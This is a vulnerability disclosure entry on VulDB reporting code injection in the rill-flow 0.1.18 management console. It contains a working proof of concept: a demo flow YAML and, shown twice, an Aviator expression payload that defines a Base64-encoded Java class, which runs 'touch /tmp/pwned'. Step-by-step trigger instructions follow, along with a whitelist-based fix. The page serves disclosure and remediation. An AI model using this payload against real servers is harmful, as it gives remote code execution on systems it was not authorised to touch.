提出 #575478: weibocom rill-flow rill-flow-0.1.18 Code Injection情報

タイトルweibocom rill-flow rill-flow-0.1.18 Code Injection
説明refer https://github.com/weibocom/rill-flow/issues/102 In the Rillflow management console, attackers can create a process list and set input mappings for nodes to process Aviator expressions, which can lead to Remote Code Execution (RCE). This allows them to escalate from a web user to gain machine privileges. JDK17's rillfow payload ··· use org.springframework.cglib.core.*;use org.springframework.util.*;use java.security.*;ReflectUtils.defineClass('org.springframework.expression.Test', Base64Utils.decodeFromString('yv66vgAAADQALAoACgAUCQAVABYIABcKABgAGQoAGgAbCAAcCgAaAB0HAB4HAB8HACABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQAIPGNsaW5pdD4BAA1TdGFja01hcFRhYmxlBwAeAQAKU291cmNlRmlsZQEACVRlc3QuamF2YQwACwAMBwAhDAAiACMBAAtzdGF0aWMgRXhlYwcAJAwAJQAmBwAnDAAoACkBABB0b3VjaCAvdG1wL3B3bmVkDAAqACsBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAjb3JnL3NwcmluZ2ZyYW1ld29yay9leHByZXNzaW9uL1Rlc3QBABBqYXZhL2xhbmcvT2JqZWN0AQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAkACgAAAAAAAgABAAsADAABAA0AAAAhAAEAAQAAAAUqtwABsQAAAAEADgAAAAoAAgAAAAQABAAFAAgADwAMAAEADQAAAFMAAgABAAAAFrIAAhIDtgAEuAAFEga2AAdXpwAES7EAAQAAABEAFAAIAAIADgAAABYABQAAAAkACAAKABEADAAUAAsAFQAOABAAAAAHAAJUBwARAAABABIAAAACABM'), ClassLoader.getSystemClassLoader(), nil, Class.forName('org.springframework.expression.ExpressionParser')); ··· Impact Rillflow * ### Proof of Concept1 1.Create a process list, click Create 2. import demo file ··· version: 1.0.0 workspace: rillFlowSimple dagName: greet alias: release type: flow inputSchema: >- [{"required":true,"name":"Bob","type":"String"},{"required":true,"name":"Alice","type":"String"}] tasks: - category: function name: Bob resourceName: http://sample-executor:8000/greet.json?user=Bob pattern: task_sync tolerance: false next: Alice inputMappings: - source: "$.context.Bob" target: "$.input.Bob" - category: function name: Alice resourceName: http://sample-executor:8000/greet.json?user=Alice pattern: task_sync tolerance: false inputMappings: - source: "$.context.Alice" target: "$.input.Alice" ··· 3. Click Bob Input payload ··· use org.springframework.cglib.core.*;use org.springframework.util.*;use java.security.*;ReflectUtils.defineClass('org.springframework.expression.Test', Base64Utils.decodeFromString('yv66vgAAADQALAoACgAUCQAVABYIABcKABgAGQoAGgAbCAAcCgAaAB0HAB4HAB8HACABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQAIPGNsaW5pdD4BAA1TdGFja01hcFRhYmxlBwAeAQAKU291cmNlRmlsZQEACVRlc3QuamF2YQwACwAMBwAhDAAiACMBAAtzdGF0aWMgRXhlYwcAJAwAJQAmBwAnDAAoACkBABB0b3VjaCAvdG1wL3B3bmVkDAAqACsBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAjb3JnL3NwcmluZ2ZyYW1ld29yay9leHByZXNzaW9uL1Rlc3QBABBqYXZhL2xhbmcvT2JqZWN0AQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAkACgAAAAAAAgABAAsADAABAA0AAAAhAAEAAQAAAAUqtwABsQAAAAEADgAAAAoAAgAAAAQABAAFAAgADwAMAAEADQAAAFMAAgABAAAAFrIAAhIDtgAEuAAFEga2AAdXpwAES7EAAQAAABEAFAAIAAIADgAAABYABQAAAAkACAAKABEADAAUAAsAFQAOABAAAAAHAAJUBwARAAABABIAAAACABM'), ClassLoader.getSystemClassLoader(), nil, Class.forName('org.springframework.expression.ExpressionParser')); ··· Then victim will execute touch /tmp/pwned. 4. Click save then set alias name 5. Click next Step,click Submit 6.Click Test Run,Input some args,execute command ### How to Fix It When using Aviator, add relevant configurations to it to prohibit the loading of external classes. https://www.yuque.com/boyan-avfmj/aviatorscript/yr1oau Simply set the classes in the whitelist to empty.
ソース⚠️ https://github.com/weibocom/rill-flow/issues/102
ユーザー
 startr4ck (UID 76213)
送信2025年05月12日 05:17 (12 月 ago)
モデレーション2025年05月16日 21:11 (5 days later)
ステータス承諾済み
VulDBエントリ309408 [weibocom rill-flow 0.1.18 Management Console 特権昇格]
ポイント20

概要

Might our Artificial Intelligence support you?

Check our Alexa App!